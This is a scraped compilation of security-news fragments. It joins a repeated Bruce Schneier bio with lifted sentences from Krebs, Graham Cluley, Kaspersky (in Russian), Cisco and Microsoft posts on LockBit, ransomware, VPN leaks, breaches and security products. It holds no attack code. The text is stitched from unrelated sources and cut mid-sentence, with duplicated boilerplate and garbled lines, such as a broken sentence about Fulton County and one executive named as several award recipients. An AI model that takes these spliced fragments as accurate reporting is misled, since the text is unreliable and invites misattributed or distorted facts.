I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

The UK Bans Default PasswordsThe UK is the first country to ban default passwords on IoT devices.

On Monday, the United Kingdom became the first country in the world to ban default guessable usernames and passwords from these IoT devices.

The Product Security and Telecommunications Infrastructure Act 2022 (PSTI) introduces new minimum-security standards for manufacturers, and demands that these companies are open with consumers about how long their products will receive security updates for.

It banned default passwords in 2018, the law taking effect in 2020.

IoT manufacturers aren’t making two devices, one for California and one for the rest of the US.

There are also important security patches available for macOS and Adobe users, and for the Chrome Web browser, which just patched its own zero-day flaw.

Five days ago, Google released a security update for Chrome that fixes a zero-day in the popular browser.

Apple has just shipped macOS Sonoma 14.5 update, which includes nearly two dozen security patches.

Finally, Adobe has critical security patches available for a range of products, including Acrobat, Reader, Illustrator, Adobe Substance 3D Painter, Adobe Aero, Adobe Animate and Adobe Framemaker.

Anyone in charge of maintaining Windows systems in an enterprise environment should keep an eye on askwoody.com, which usually has the scoop on a…

The Treasury filing says Khoroshev used the emails [email protected], and [email protected].

Cyber intelligence firm Intel 471 finds that [email protected] was used by a Russian-speaking member called Pin on the English-language cybercrime forum Opensc.

In response to an Exploit member who complained that the security industry was making it harder to profit from ransomware, Putinkrab said that was because so many cybercriminals were relying on crappy ransomware code.

Contact with the owner of the key is lost over time.”Putinkrab said he had every confidence his ransomware code was a game-changer, and a huge money machine.

The Justice Department says the LockBit ransomware affiliate prog…

The United States joined the United Kingdom and Australia today in sanctioning 31-year-old Russian national Dmitry Yuryevich Khoroshev as the alleged leader of the infamous ransomware group LockBit.

The government says LockBit victims included individuals, small businesses, multinational corporations, hospitals, schools, nonprofit organizations, critical infrastructure, and government and law-enforcement agencies.

One of the victims LockBitSupp continued extorting was Fulton County, Ga. Eve LockBit’s darknet sites.

KrebsOnSecurity has been in intermittent contact with LockBitSupp for several months over the course of reporting on different LockBit victims.

The government says Russian nation…

When a device initially tries to connect to a network, it broadcasts a message to the entire local network stating that it is requesting an Internet address.

VPNs work by creating a virtual network interface that serves as an encrypted tunnel for communications.

Once the network’s legitimate DHCP server is completely tied up, the attacker can then have their rogue DHCP server respond to all pending requests.

“This technique can also be used against an already established VPN connection once the VPN user’s host needs to renew a lease from our DHCP server,” the researchers wrote.

“VPNs weren’t designed to keep you more secure on your local network, but to keep your traffic more secure on the …

Ransom_man announced on the dark web that he would start publishing 100 patient profiles every 24 hours.

When Vastaamo declined to pay, ransom_man shifted to extorting individual patients.

KrebsOnSecurity detailed the work of HTP in September 2013, after the group compromised servers inside data brokers LexisNexis, Kroll, and Dun & Bradstreet.

The group used the same ColdFusion flaws to break into the National White Collar Crime Center (NWC3), a non-profit that provides research and investigative support to the U.S. Federal Bureau of Investigation (FBI).

Ransom_man bragged about Vastaamo’s sloppy security, noting the company had used the laughably weak username and password “root/root” to p…

In February 2020, the FCC put all four wireless providers on notice that their practices of sharing access to customer location data were likely violating the law.

The FCC found Verizon sold access to customer location data (indirectly or directly) to 67 third-party entities.

The carriers promised to “wind down” location data sharing agreements with third-party companies.

The fine amounts vary because they were calculated based in part on each day that the carriers continued sharing customer location data after being notified that doing so was illegal (the agency also considered the number of active third-party location data sharing agreements).

The FCC notes that AT&T and Verizon took more…

The protection scheme was exposed in 2022 when Russian authorities arrested six members of the group, which sold millions of stolen payment cards at flashy online shops like Trump’s Dumps.

Tsaregorodtsev was head of the counterintelligence department for a division of the FSB based in Perm, Russia.

In February 2022, Russian authorities arrested six men in the Perm region accused of selling stolen payment card data.

The FSB arrested Tsaregorodtsev, and seized $154,000 in cash, 100 gold bars, real estate and expensive cars.

The stolen customer payment card details were then sold on sites like Trump’s Dumps and Sky-Fraud.

Rescator said the data exposed included employer, name, address, phone, taxable income, tax refund amount, and bank account number.

KrebsOnSecurity sought comment from the Secret Service, South Carolina prosecutors, and Mr. Keel’s office.

The AP says South Carolina paid $12 million to Experian for identity theft protection and credit monitoring for its residents after the breach.

Mr. Keel’s assertion that somehow the efforts of South Carolina officials following the breach may have lessened its impact on citizens seems unlikely.

It remains unclear why Shefel has never been officially implicated in the breaches at Target, Home Depot, or in South Carolina.

The lock’s maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021.

Meanwhile, Chirp’s parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

On March 7, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.

Neither August nor Chirp Systems responded to requests for comment.

It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state t…

CISA urged all Sisense customers to reset any credentials and secrets that may have been shared with the company, which is the same advice Sisense gave to its customers Wednesday evening.

It is clear, however, that unknown attackers now have all of the credentials that Sisense customers used in their dashboards.

Beyond that, it is largely up to Sisense customers to decide if and when they change passwords to the various third-party services that they’ve previously entrusted to Sisense.

But when confronted with the details shared by my sources, Sisense apparently changed its mind.

“If they are hosting customer data on a third-party system like Amazon, it better damn well be encrypted,” Weave…

On April 9, Twitter/X began automatically modifying links that mention “twitter.com” to read “x.com” instead.

Those include carfatwitter.com, which Twitter/X will now truncate to carfax.com when the domain appears in user messages or tweets.

A number of these new domains including “twitter.com” appear to be registered defensively by Twitter/X users in Japan.

The domain netflitwitter.com (netflix.com, to Twitter/X users) now displays a message saying it was “acquired to prevent its use for malicious purposes,” along with a Twitter/X username.

Some of the domains registered recently and ending in “twitter.com” currently do not resolve and contain no useful contact information in their registr…

Although to be fair, it would be tough for Microsoft to eclipse the number of vulnerabilities fixed in this month’s patch batch — a record 147 flaws in Windows and related software.

Microsoft today released updates to address 147 security holes in Windows, Office, Azure, .NET Framework, Visual Studio, SQL Server, DNS Server, Windows Defender, Bitlocker, and Windows Secure Boot.

Childs said one ZDI’s researchers found this vulnerability being exploited in the wild, although Microsoft doesn’t currently list CVE-2024-29988 as being exploited.

“BlackLotus can bypass functionality called secure boot, which is designed to block malware from being able to load when booting up.

Adobe has since clar…

Fory66399 insisted that their website — privnote[.

The tornote.io website has a different color altogetherThe privatenote,io website also has a different color!

Other Privnote phishing domains that also phoned home to the same Internet address as pirwnote[.

A review of the passive DNS records tied to this address shows that apart from subdomains dedicated to tornote[.

How profitable are these private note phishing sites?

Since that story ran, KrebsOnSecurity has heard from this Saim Raza identity on two occasions.

“Hello, we already leave that fud etc before year,” the Saim Raza identity wrote.

I already leave everything.”Asked to elaborate on the police investigation, Saim Raza said he was freshly released from jail.

Now I want to start my new work.”Exactly what that “new work” might entail, Saim Raza wouldn’t say.

“After your article our police put FIR on my [identity],” Saim Raza explained.

Thread hijacking attacks.

Here’s the story of a recent thread hijacking attack in which a journalist was copied on a phishing email from the unwilling subject of a recent scoop.

Thread hijacking attacks are hardly new, but that is mainly true because many Internet users still don’t know how to identify them.

In contrast, thread hijacking campaigns tend to patiently prey on the natural curiosity of the recipient.

“We call these mutli-persona phishing scams, and they’re often paired with thread hijacking,” Kalember said.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

All this and more is discussed in the latest edition of the award-winning “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

Smashing Security listeners get 20% off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

Security agencies in the United States have issued a new warning about the Black Basta ransomware group, in the wake of a high-profile attack against the healthcare giant Ascension.

The cyber attack last week forced the Ascension computer systems offline, and caused some hospital emergency departments to turn away ambulances "in order to ensure emergency cases are triaged immediately."

In a statement, Ascension confirmed that while its hospitals were providing healthcare, the ransomware attack meant that its electronic health records and other systems used to order tests, procedures, and medications were currently unavailable.

Now the FBI, CISA, and other US government agencies have release…

A Korean cybersecurity expert has been sentenced to prison for illegally accessing and distributing private videos from vulnerable "wallpad" cameras in 400,000 private households.

The 41-year-old man, who has not been officially named, succeeded in remotely accessing 638 apartment complexes in South Korea.

He exploited over 400,000 smart home devices used by residents to operate their video security systems and other domestic functions.

The hacker was arrested by South Korea's national police agency at the end of 2022.

Investigators seized computer equipment and found 213 videos and 400,000 photos that had been illegally filmed inside homes through hacked wallpad cameras.

Boeing has confirmed that it received a demand for a massive $200 million after a ransomware attack by the notorious LockBit hacking group in October 2023.

The indictment details Khoroshev's alleged criminal activities and references "a multinational aeronautical and defense corporation headquartered in Virginia" that received a ransom demand equivalent to approximately $200 million.

Ultimately, LockBit did publish some 43GB of data they claimed had been stolen from Boeing, claiming that negotiations with Boeing for the ransom payment had broken down.

It seems the extortionists bit off more than they could chew when asking for such an astronomical ransom payment.

LockBitSupp, meanwhile, has…

The real name of LockBitSupp, the kingpin of LockBit, has been a secret for years despite many attempts to unmask them.

Law enforcement's claims of disrupting the gang's operations were scorned by LockBitSupp, who even offered their own $10 million reward for anyone who was able to tell them their true identity.

Unsurprisingly, many amateur sleuths are using information released by the authorities in an attempt learn more about Dmitry Khoroshev - and potentially win their share of a reward if he is ever detained.

And despite his claims of living the high life as a millionaire on a yacht with a bevy of young women, his life appears to be rather less glamorous.

And the spotlight being shone o…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

A medical lab that specialises in cancer screenings has admitted to an alarming data breach that left sensitive patient information exposed for years - and accessible by unauthorised parties.

California-based Guardant Health is notifying affected individuals that information related to samples collected in late 2019 and 2020 was "inadvertently" left exposed online to the general public after an employee mistakenly uploaded it.

Worryingly, Guardant Health warns that the data was accessible for an extended period of time - from October 5, 2020 to February 29, 2024 - before being noticed by the company.

Guardant Health has not shared details of how many patients have had their privacy put at r…

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by “Ransomware Sommelier” Allan Liska.

Smashing Security listeners get 20% off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

All this and much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Paul Ducklin.

Smashing Security listeners get 20% off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Czech news agency ČTK announced on Tuesday that a hacker had managed to break into its systems and published fake news reports of a plot to murder the president of a neighbouring country.

A follow-up fake news story published by the hacker on ČTK's website and mobile app claimed that Czech Foreign Minister Jan Lipavský had commented on the alleged murder plot.

The hacker's haste in publishing false news led to careless mistakes that tipped off readers to its lack of factual basis.

Last year, security researchers described how a hacking group called "Ghostwriter" affiliated with the Belarus government had gained access to media organisations' content management systems to post false stories.…

All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

Smashing Security listeners get 20% off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

But the ransomware attack on Leicester City Council's infrastructure doesn't stop there.

As local media reports, residents have noticed that some street lights have been constantly shining, 24 hours a day, ever since.

He was told by the council that the ransomware attack had affected the city's "central management system" and had resulted in the street lights "misbehaving".

Perhaps it is surprising to some of us that street lights would be centrally controlled at all.

Even if the Leicester City Council wanted to pay the ransom (it says it will not),The City Council says it will not be paying any ransom.

Не так давно мы рассказывали о том, насколько опасны современные автомобили с точки зрения количества данных, собираемых ими о своих владельцах.

Это брокер данных, работающий с автостраховщиками и обычно поставлявший им информацию об авариях и штрафах водителей.

Не увенчались успехом и попытки найти четкие предупреждения о данном факте как в тексте условий использования мобильных приложений General Motors, так и в положении о конфиденциальности, опубликованном на сайте OnStar.

Однако не исключено, что рано или поздно подобные практики будут взяты на вооружение и в других регионах.

Как защититься от сбора автомобилем данных о вожденииК сожалению, не существует универсального совета о том, ка…

Они встречаются как в атаках, доведенных до конца и приведших к ущербу, так и в инцидентах, остановленных на ранних стадиях.

Мы решили перечислить эти техники, опираясь на классификацию ATT&CK, и обобщить рекомендации экспертов по их нейтрализации.

Также злоумышленники активно ищут и эксплуатируют находящиеся в открытом доступе панели управления IT-инфраструктурой — от серверов SSH до SNMP.

Регулярно сканируйте внешний периметр в поисках уязвимостей и просто приложений, внешний доступ к которым предоставлен случайно и должен быть отозван.

В 2023 году были весьма популярны старые уязвимости в SMB v1 и Exchange Server, что подтверждает недостаточное внимание IT-служб к устранению уязвимостей.

В сотовых M2M-модемах Telit Cinterion были обнаружены несколько серьезных уязвимостей, включая возможность удаленного выполнения произвольного кода (RCE) посылкой SMS-сообщений.

Критические уязвимости в модемах CinterionВ общей сложности эксперты Kaspersky ICS-CERT обнаружили в модемах Telit Cinterion семь уязвимостей нулевого дня:Наибольшую опасность представляет собой первая уязвимость из этого списка (CVE-2023-47610).

Компания Cinterion в 2010 году была приобретена компанией Gemalto.

Наконец, в 2023 году Thales продала линейку модемов Cinterion компании Telit, в результате этой сделки образовалась компания Telit Cinterion.

В ближайшем будущем наши эксперты планируют опубликовать подробны…

DensePose: методика распознавания человеческих поз на изображенияхНачать, впрочем, придется немного издалека — сперва следует разобраться с тем, как в целом работает точное распознавание человеческого тела и его позы.

С ее помощью они успешно распознавали человеческие позы на фотографиях — сугубо на основе двумерных картинок, без использования данных о третьей координате — глубине.

Также, если верить приведенным в работе изображениям и опубликованным исследователями видеороликам, система уверенно справляется с не самыми обычными вариантами положения тела в пространстве.

Далее они запустили DensePose, которая распознавала положения тел с помощью камеры, установленной рядом с роутером-приемни…

Прямо на них выкладываются исходники проектов, предлагаются исправления и дополнения в код, а зачастую есть возможность скачать и готовую сборку приложения.

Единственное решение — полностью отключить комментарии (на GitHub это можно сделать на срок до шести месяцев), но это лишит разработчиков обратной связи.

В GitLab механика работы с комментариями аналогична, и там тоже можно публиковать файлы с помощью так и не отправленных комментариев.

Уже обнаружены вредоносные кампании, в которых в репозиториях Microsoft оставляют «комментарии» с файлами, содержащими якобы приложение для жульничества в играх.

Как защититься от вредоносного контента на GitHub и GitLabПока эту особенность дизайна, позв…

Каждый год миллионы аккаунтов компрометируют атакой с подстановкой учетных данных.

В этом посте поговорим подробнее о том, как работает подстановка учетных данных, что за данные злоумышленники используют и как защитить ресурсы организации от подобных атак.

Как работают атаки с подстановкой учетных данныхПодстановка учетных данных (credential stuffing) — это один из самых эффективных вариантов атаки на учетные записи.

Для таких атак используются огромные базы данных с заранее добытыми логинами и паролями от аккаунтов на тех или иных платформах.

Как защититься от атак с подстановкой учетных данныхЧтобы защитить ресурсы организации от атаки с помощью подстановки учетных данных, мы рекомендуем …

К сожалению, программа Googerteller поставляется только в виде исходного кода на GitHub, который все желающие послушать онлайн-слежку своими собственными ушами могут скомпилировать у себя на компьютере и только потом запустить.

Вот здесь доступен код оригинальной Googerteller для Linux, macOS и прочих X-систем, а здесь выложена «фанатская версия» для Windows — GoogeDotTeller.

Единственный способ испытать Googerteller без компиляции — плагин «по мотивам Googerteller» для Mozilla Firefox (а тут выложен его исходный код).

А вот браузерное расширение Listening Back по-прежнему остается доступно в официальных магазинах расширений — как для Google Chrome, так и для Mozilla Firefox.

А затем, запус…

В этом году в качестве наглядного пособия выступит только что завершившийся третий сезон анимационного сериала «Звездные войны: Бракованная партия».

Секретность базы ТантиссДоктор Хемлок, непосредственный руководитель базы Тантисс и научного проекта «Некромант», пользуется полным доверием императора и располагает неограниченными ресурсами.

И в отличие от большинства имперских лидеров, которых мы видели до этого, он подходит к своей задаче ответственно.

Координаты Тантисс загружаются непосредственно в навигационный компьютер корабля сразу после взлета и каким-то образом не хранятся в нем.

Внешний периметр базы охраняется в том числе и при помощи дрессированных местных хищников.

Взлом Dropbox Sign: как это случилось и что в итоге утеклоНеким злоумышленникам удалось скомпрометировать сервисную учетную запись Dropbox Sign и таким образом получить доступ к внутреннему инструменту автоматической настройки платформы.

В качестве защитной меры в Dropbox сбросили пароли для всех аккаунтов Dropbox Sign и завершили все активные сессии — так что в сервис придется логиниться заново, в процессе устанавливая новый пароль.

Dropbox Sign, ранее известный как HelloSign, — это отдельный инструмент Dropbox для облачного документооборота, в первую очередь для подписания электронных документов.

Как подчеркивает компания в своем заявлении, инфраструктура Dropbox Sign «в значительной степ…

Как мы проверяем ваши данныеМы проверяем, скомпрометированы ли ваши данные и пароли, тремя способами:По адресу электронной почты для пользователей Kaspersky Standard, Kaspersky Plus и Kaspersky Premium.

Почему хранить пароли в Kaspersky Password Manager проще и безопаснееЗапоминать все пароли или держать их, например, в приложениях для заметок — небезопасно.

Он создает, хранит и автоматически подставляет надежные и уникальные пароли на веб-сайтах и в приложениях, проверяет, не скомпрометированы ли они, генерирует коды двухфакторной аутентификации.

Но как же тогда мы проверяем ваши пароли и «пробиваем» их по базам утечек?

А еще, представьте себе, на многих сервисах — в том числе и в Kaspersk…

Именно такую операционную систему — Kaspersky Thin Client 2.0 — мы и предлагаем использовать в устройствах для подключения к инфраструктуре виртуальных рабочих столов.

Что такое Kaspersky Thin Client и чем может похвастаться версия 2.0?

По сути Kaspersky Thin Client 2.0 — это обновленная операционная система для тонких клиентов, созданная в соответствии с кибериммунным подходом, а потому не требующая наложенных средств защиты.

В основе Kaspersky Thin Client лежит наша система KasperskyOS, что минимизирует риски ее компрометации даже в случае сложных атак.

Также Kaspersky Thin Client 2.0 поддерживает подключение к отдельным бизнес-приложениям на базе инфраструктуры Microsoft Remote Desktop S…

Сегодня расскажем про мошенническую схему «заработка с Toncoin» — криптовалютой, созданной на основе технологий Telegram.

Этап первый: подготовьсяДля начала мошенники предлагают зарегистрировать криптокошелек в неофициальном боте для хранения крипты в Telegram, а после указать данные своего вновь созданного кошелька в боте для «заработка» с помощью покупки ускорителей.

Дальше по инструкции скамеров жертве требуется купить 5,5–501 тонкойн (TON), при этом один TON по текущему курсу эквивалентен примерно пяти-шести долларам.

Чем круче тариф, тем выше комиссионный процент, — «байк» стоит пять тонкойнов и дает 30% комиссии, «ракета» — 500 TON и 70%.

После этого, по задумке мошенников, жертва дол…

В результате в почтовый ящик падает огромное количество подтверждений, ссылок для активации аккаунта и тому подобных писем.

В частности, в приведенном примере атаки через механизмы регистрации оператор может заблокировать письма по наличию в поле Subject слова «регистрация» на различных языках (Registrace | Registracija | Registration | Registrierung | Regisztráció).

В результате письма будут автоматически отправляться в карантин, не доходя до папки «входящие» и не перегружая почтовый сервер.

Гибкая фильтрация бизнес-рассылокРазумеется, новые возможности нашего решения можно применять не только для защиты от почтовых DDoS-атак.

Подробнее узнать о Kaspersky Secure Mail Gateway, части решения…

Какую информацию можно извлечь из перехваченных сообщений чат-ботов на основе ИИРазумеется, чат-боты отправляют сообщения в зашифрованном виде.

Чтобы понять, что же происходит в ходе этой атаки, придется слегка погрузиться в детали механики LLM и чат-ботов.

Так что для дальнейшего восстановления текста исходного сообщения из полученной последовательности длин токенов исследователи использовали именно LLM.

Как минимум два разработчика чат-ботов с ИИ — Cloudflare и OpenAI — уже отреагировали на публикацию исследования и начали использовать упомянутый выше метод дополнения (padding), который как раз и придуман для противодействия такого рода атакам.

Вероятно, остальные разработчики чат-ботов с…

Cisco Secure Email Threat Defense uses these models to leverage multiple detection engines that simultaneously evaluate different portions of an incoming email to detect malicious intent while allowing legitimate messages to go through.

However, if we consider the malicious messages, 90% of them come from new senders that were never seen before.

When considering AI-driven email security, one thing is clear, the landscape of digital defense has been forever altered.

You can count on the Cisco Secure Email Threat Defense to keep your business and information secure.

To read more about the AI in Secure Email Threat Defense, read the white paper.

Cisco is honored to be a partner of the Black Hat NOC (Network Operations Center), and this was our seventh year supporting Black Hat Asia.

The Cisco contributions to the network and security operations evolved, with the needs of the customer, to include more components of the Cisco Security Cloud.

We appreciate alphaMountain.ai, Pulsedive and Recorded Future donating full licenses to Cisco, for use in the Black Hat Asia 2024 NOC.

In most cases, they traced the anomaly to an authorized Black Hat Training or Briefing source and closed such cases as “Black Hat Positive”; meaning you would not allow this on your production network, but for Black Hat, it is business as usual.

During the confere…

Today, we are we’re bringing on-prem and cloud security together into one unified platform through the Cisco Security Cloud to marry the power of Cisco Secure Firewall and Cisco Multicloud Defense.

As we continue to innovate across the Cisco Security Cloud, synergies across the network security portfolio will continue to grow.

The launch of these shared capabilities between Cisco Secure Firewall and Cisco Multicloud Defense is a significant step towards converging the fabrics of best-in-class data center and cloud security to protect customers from ground to cloud.

Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

Cisco Security Social ChannelsInstagramFaceboo…

They must properly manage their solution development and operational practices to meet the varying demands of each market, while offering high levels of data security and privacy to their users.

Today, we are proud to announce the public availability of the Cisco Cloud Controls Framework v3.0.

This update extends the CCF with additional, globally accepted, security compliance frameworks and certifications.

Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

Cisco Security Social ChannelsInstagramFacebookTwitterLinkedInShareShare:

I am pleased to announce the launch of the AI Assistant in XDR as a part of our Breach Protection Suite.

In our RSAC 2023 announcement, we introduced a vision of our Cisco SOC Assistant, designed to expedite threat detection and response.

Enable Seamless Collaboration Across Security TeamsThe Cisco AI Assistant, embedded within XDR, facilitates team collaboration using Webex, Teams, or Slack.

This is the transformative power of the Cisco XDR combined with Cisco’s AI Assistant revolutionizing enterprise security.

Learn how Cisco Breach Protection Suite, Cisco XDR and our AI Assistant can simplify your security operations.

What about the yet-to-be-announced and even yet-to-be-discovered vulnerabilities, the unknown vulnerabilities?

Hypershield’s unknown vulnerability protection can help detect and block unknown vulnerabilities within runtime workload environments.

This enables Hypershield to create an application behavior graph and an application fingerprint.

Advanced methods for unknown vulnerability protectionHypershield uses various methods to detect and contain unknown vulnerabilities.

Application-specific behavior classificationsAs described above, one method Hypershield employs to identify unknown vulnerabilities involves contrasting CWEs with the application behavior graph.

That is why I am so excited about the integration of Cisco XDR and Splunk Enterprise Security.

We can answer those questions through the integration of Cisco XDR with Splunk Enterprise Security.

Cisco XDR and Splunk Enterprise Security is the most complete security operations platform in the market today because it doesn’t try to force the company into something that it’s not — or not yet.

We’re looking forward to connecting with you at our booth and discussing ways you can accelerate your SOC with Cisco + Splunk.

Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

Cisco has created such a fabric — Cisco Hypershield — that we discuss in the paragraphs below.

Virtual/Container Network Enforcement Point: Here, a software network enforcement point runs inside a virtual machine or container.

Centralized security policyThe usual retort to distributed security enforcement is the nightmare of managing independent security policies per enforcement point.

The administrator’s faith in the security fabric — Cisco Hypershield — deepens after a few successful runs through the segmentation process.

ConclusionIn both the examples discussed above, we see Cisco Hypershield function as an effective and efficient security fabric.

I’m proud to announce Cisco Hypershield, the first truly distributed, AI-native system that puts security wherever it needs to be: in every software component of every application running on your network; on every server; and in your public or private cloud deployments.

They converted these products into thousands of pieces of software — including security software — that could run on every server.

Built within the Cisco Security Cloud, Hypershield, plus the processing, protection, and data capabilities within Splunk, will create a transformative hyperscale datacenter that not only leads the AI revolution, but protects it.

We’ll share more soon, but for now, you can expect Cisco Hypershield…

Cisco XDR is a leader in providing comprehensive threat detection and response across the entire attack surface.

Cutting-Edge Innovations in Cisco XDRAt the heart of these innovations is the Cisco AI Assistant in XDR.

The Cisco AI Assistant gives analysts contextual insights, guided responses, and best next steps.

We will also show Cisco Identity Intelligence capabilities.

Cisco XDR can detect and respond to sophisticated identity-based attacks with accuracy and speed by incorporating identity as a source of telemetry.

Two leading players in this space, Cisco’s Duo Security and Cisco Identity Intelligence, have emerged as champions in Identity Threat Detection & Response.

The Power of Identity Threat Detection & ResponseIdentity Threat Detection & Response (ITDR) has become a vital aspect of modern cybersecurity.

Cisco Identity Intelligence: Elevating Cybersecurity PreparednessCisco Identity Intelligence brings an additional layer of protection to the table with its advanced capabilities in anomaly detection and behavioral analytics.

How Cisco Identity Intelligence Complements Cisco’s Duo SecurityEnhanced Anomaly Detection: While Cisco’s Duo Security provides robust MFA and access controls, Cisco Identity…

Cisco Telemetry Broker (CTB) Release 2.1.3 is generally available as of March 25, 2024.

Cisco Telemetry Broker is the answer.

It can broker hybrid cloud data, filter unneeded data, and transform data into a more usable format.

Produces Telemetry for Devices that Cannot Generate NetFlow NativelyTo support the notion of an intelligent telemetry plane, there is a need to generate NetFlow for devices that might not be capable of generating the protocol natively.

Additionally, the CTB Broker to CTB Manager data bandwidth was optimized which improves overall performance significantly and allows scalability of the Manager node.

It’s one thing to claim leadership in cloud security; it’s another to have that leadership acknowledged by industry experts.

That’s why we’re thrilled to announce our recent recognition by Frost & Sullivan as the 2024 Customer Value Leader in the Global Security Service Edge Industry.

Frost & Sullivan’s Customer Value Leadership Award recognizes the company that offers products or services customers find superior for the overall price, performance, and quality.

Vendors are evaluated on business impact criteria (including financial performance, customer acquisition, operational efficiency, growth potential, and human capital) and customer impact criteria (price/performance value, customer pu…

These attackers used compromised credentials to repeatedly attempt to sign in to the company’s real Microsoft 365 page, triggering the series of MFA notifications—an attack technique known as MFA exhaustion.

According to this quarter’s Talos IR report, using compromised credentials on valid accounts was one of two top initial access vectors.

How credentials are compromisedPhishing, while one of the most popular methods, isn’t the only way that attackers gather compromised credentials.

Reducing the impact of compromised credentialsIt goes without saying that protecting credentials from being compromised and abused is important.

To illustrate, let’s look at when the threat actor begins hammer…

Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool Quick Assist to target users in social engineering attacks.

Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity.

Social engineeringOne of the social engineering techniques used by threat actors to obtain initial access to target devices using Quick Assist is through vishing attacks.

U.S. Department of Health and Human Services, Health Sector Cybersecurity Coordination CenterLearn moreFor the …

In a significant step, we have launched the unified security operations platform, a single experience across security information and event management (SIEM), extended detection and response (XDR), and Microsoft Copilot for Security.

Microsoft Sentinel Build next-generation security operations powered by the cloud and AI.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity1Gartner® Magic Quadrant™ for Security Information and Event Management, Andrew Davies, Mitchell Schneider, Rustam Malik, Eric Ahlm, May 8 2024.

Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should …

This is the distinction between identity fabric and the next step: trust fabric.

The vision for how to conceptually architect and move forward with this comprehensive defense-in-depth cybersecurity strategy is the same as a trust fabric.

Zero Trust and a trust fabricZero Trust is the term for an evolving set of cybersecurity paradigms that move cybersecurity defenses from static, network-based perimeters to focus on users, assets, and resources.

The Zero Trust principles are foundational to how organizations should architect a trust fabric, and instructional for how to build technology to bring the trust fabric to life.

The Microsoft trust fabricAt Microsoft, we continue to design and innov…

At this year’s Microsoft Security Excellence Awards, we took a journey through the evolution of cybersecurity from the 1950s to today.

“I’m so pleased to congratulate this year’s Microsoft Security Excellence awards recipients and to acknowledge all those who were nominated,” said Vasu Jakkal, Corporate Vice President, Microsoft Security Business.

Security MSSP of the Year: Vasu Jakkal, Corporate Vice President, Microsoft Security Business.

Security ISV of the Year: Vasu Jakkal, Corporate Vice President, Microsoft Security Business.

To learn more about Microsoft Security solutions, visit our website.

Today, new capabilities are now available in Microsoft Defender and Microsoft Purview to help organizations secure and govern generative AI applications at work.

Secure your AI transformation with Microsoft SecurityWherever your organization is in your AI transformation, you will need comprehensive security controls to secure govern your AI applications and data throughout their lifecycle—development, deployment, and runtime.

With the new capabilities announced today, Microsoft becomes the first security provider to deliver end-to-end AI security posture management, threat protection, data security, and governance for AI.

Discover new AI attack surfaces, strengthen your AI security posture,…

